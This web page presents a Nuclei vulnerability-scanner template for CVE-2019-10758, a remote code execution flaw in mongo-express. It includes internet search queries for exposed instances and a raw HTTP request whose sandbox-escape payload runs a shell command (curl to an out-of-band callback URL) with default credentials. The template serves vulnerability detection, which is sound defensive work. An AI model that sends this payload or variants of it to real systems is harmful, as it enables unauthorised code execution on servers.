mongo-express Remote Code Execution
ID: CVE-2019-10758
Severity: critical
Author: princechaddha
Tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js
Description
Section titled “Description”mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the toBSON method and misuse the vm dependency to perform exec commands in a non-safe environment.
YAML Source
Section titled “YAML Source”id: CVE-2019-10758
info: name: mongo-express Remote Code Execution author: princechaddha severity: critical description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade mongo-express to version 0.54.0 or higher. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 - https://github.com/CLincat/vulcat - https://github.com/MelanyRoob/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2019-10758 epss-score: 0.97459 epss-percentile: 0.99955 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 vendor: mongo-express_project product: mongo-express framework: node.js shodan-query: - http.title:"Mongo Express" - http.title:"mongo express" fofa-query: title="mongo express" google-query: intitle:"mongo express" tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js
http: - raw: - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")
matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"# digest: 4b0a00483046022100952637f8988c6220145c23ac20bb39062f6e0f60f28c5adb2b9a306c8a30b2f00221009d6e6eee3bb07b8e41d0bac6231ddc8b03eda245e5ac65083a196a1e81210cc8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-10758.yaml"